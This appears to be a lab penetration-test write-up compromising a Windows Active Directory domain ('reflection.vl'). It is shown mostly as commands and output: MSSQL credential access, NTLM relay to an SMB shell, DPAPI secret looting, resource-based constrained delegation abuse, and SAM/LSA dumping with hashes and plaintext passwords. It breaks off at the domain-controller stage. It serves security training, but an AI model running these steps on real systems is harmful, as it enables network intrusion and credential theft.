Nmap scan report for 10.10.241.133
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack ttl 127
1433/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
3269/tcp open tcpwrapped syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49673/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
58981/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Nmap scan report for 10.10.241.134
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
445/tcp open microsoft-ds? syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
Nmap scan report for 10.10.241.135
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
445/tcp open microsoft-ds? syn-ack ttl 127
3389/tcp open ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
Connecting to MSSQL and discovering a valid user credentiales
❯ impacket-mssqlclient ms01.reflection.vl/web_staging:'Washroom510'@10.10.241.134
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MS01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(MS01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (web_staging guest@master)>
SQL (web_staging guest@master)> SELECT name FROM master.dbo.sysdatabases;
name
-------
master
tempdb
model
msdb
staging
SQL (web_staging guest@master)> use staging;
SQL (web_staging dbo@staging)> select * from staging.information_schema.tables;
TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE
------------- ------------ ---------- ----------
staging dbo users b'BASE TABLE'
SQL (web_staging dbo@staging)> select * from users
id username password
-- -------- -------------
1 b'dev01' b'Initial123'
2 b'dev02' b'Initial123'
SQL (web_staging dbo@staging)>
NTLM Relay Attack via socks proxy
The previous enumeration indicated that some servers did not have SMB signing disabled, making them vulnerable to NTLM Relay attacks.
Setting up the ntlmrelayx tool to initiate a interactive shell.
❯ sudo impacket-ntlmrelayx -smb2support -t 10.10.241.133 -i
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client DCSYNC loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client SMB loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client SMTP loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server on port 445
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server on port 9389
[*] Setting up RAW Server on port 6666
[*] Multirelay disabled
[*] Servers started, waiting for connections
Triggering the authentication to perform the relay
[*] SMBD-Thread-5 (process_request_thread): Received connection from 10.10.241.134, attacking target smb://10.10.241.133
[*] Authenticating against smb://10.10.241.133 as REFLECTION/SVC_WEB_STAGING SUCCEED
[*] Started interactive SMB client shell via TCP on 127.0.0.1:11000
Downloading the database production user.
❯ nc 127.0.0.1 11000
Type help for list of commands
# shares
ADMIN$
C$
IPC$
NETLOGON
prod
SYSVOL
# ls
drw-rw-rw- 0 Wed Jun 7 13:44:26 2023 .
drw-rw-rw- 0 Wed Jun 7 13:43:22 2023 ..
-rw-rw-rw- 45 Thu Jun 8 07:24:39 2023 prod_db.conf
# get prod_db.conf
❯ impacket-mssqlclient ms01.reflection.vl/web_prod:'Tribesman201'@10.10.241.133
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
SQL (web_prod guest@master)> SELECT name FROM master.dbo.sysdatabases;
prod
SQL (web_prod guest@master)> use prod;
SQL (web_prod dbo@prod)> select * from prod.information_schema.tables;
TABLE_CATALOG TABLE_SCHEMA TABLE_NAME TABLE_TYPE
------------- ------------ ---------- ----------
prod dbo users b'BASE TABLE'
SQL (web_prod dbo@prod)> select * from users;
id name password
-- --------------- -----------------
1 b'abbie.smith' b'CMe1x+nlRaaWEw'
2 b'dorothy.rose' b'hC_fny3OK9glSJ'
SQL (web_prod dbo@prod)>
Using a valid credentials the tester proceeded to enumerate the domain controler by using bloodhound.
Reading LAPS password on MS01
The user abbie.smith possesses GenericAll over MS01 which means the user can abuse of this machine using RBCD or reading the LDAP password. (RBCD was not possible due the MachineAccountQuota is 0)
nxc smb 10.10.210.214 -u 'Administrator' -p 'H447.++h6g5}xi' --local-auth --dpapi
SMB 10.10.210.214 445 MS01 [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:MS01) (signing:False) (SMBv1:False)
SMB 10.10.210.214 445 MS01 [+] MS01\Administrator:H447.++h6g5}xi (Pwn3d!)
SMB 10.10.210.214 445 MS01 [*] Collecting User and Machine masterkeys, grab a coffee and be patient...
SMB 10.10.210.214 445 MS01 [+] Got 10 decrypted masterkeys. Looting secrets...
SMB 10.10.210.214 445 MS01 [SYSTEM][CREDENTIAL] Domain:batch=TaskScheduler:Task:{013CD3ED-72CB-4801-99D7-8E7CA1F7E370} - REFLECTION\Georgia.Price:DBl+5MPkpJg5id
Compromising WS01
Abusing Resource Based Constrained Delegation
❯ impacket-rbcd -delegate-from 'MS01$' -delegate-to 'WS01$' -action 'write' 'REFLECTION.vl/Georgia.Price:DBl+5MPkpJg5id'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] MS01$ can now impersonate users on WS01$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] MS01$ (S-1-5-21-3375389138-1770791787-1490854311-1104)
Requesting Ticket Granting Ticket via S4U
❯ impacket-getST -spn 'cifs/ws01.reflection.vl' -impersonate 'administrator' 'reflection.vl/MS01$' -hashes :c4b7d1086f04073b2b2f71cb075b3d52 2>/dev/null
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@cifs_ws01.reflection.vl@REFLECTION.VL.ccache
Authenticating into WS01 as NT Authority System
❯ KRB5CCNAME='administrator@cifs_ws01.reflection.vl@REFLECTION.VL.ccache' impacket-smbexec -k -no-pass ws01.reflection.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>whoami
nt authority\system
C:\Windows\system32>
Dumping SAM and LSA Secrets
❯ KRB5CCNAME='administrator@cifs_ws01.reflection.vl@REFLECTION.VL.ccache' impacket-secretsdump -k -no-pass ws01.reflection.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
<SNIF>
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a29542cb2707bf6d6c1d2c9311b0ff02:::
reflection.vl\Rhys.Garner:knh1gJ8Xmeq+uP
Compromising Domain Controller (DC01)
During the enumeration, the tester discovered a user named DOM_RGARNER, which looked similar to the previously obtained username, Rhys.Garner. The tester then proceeded to use NetExec to check the credentials.
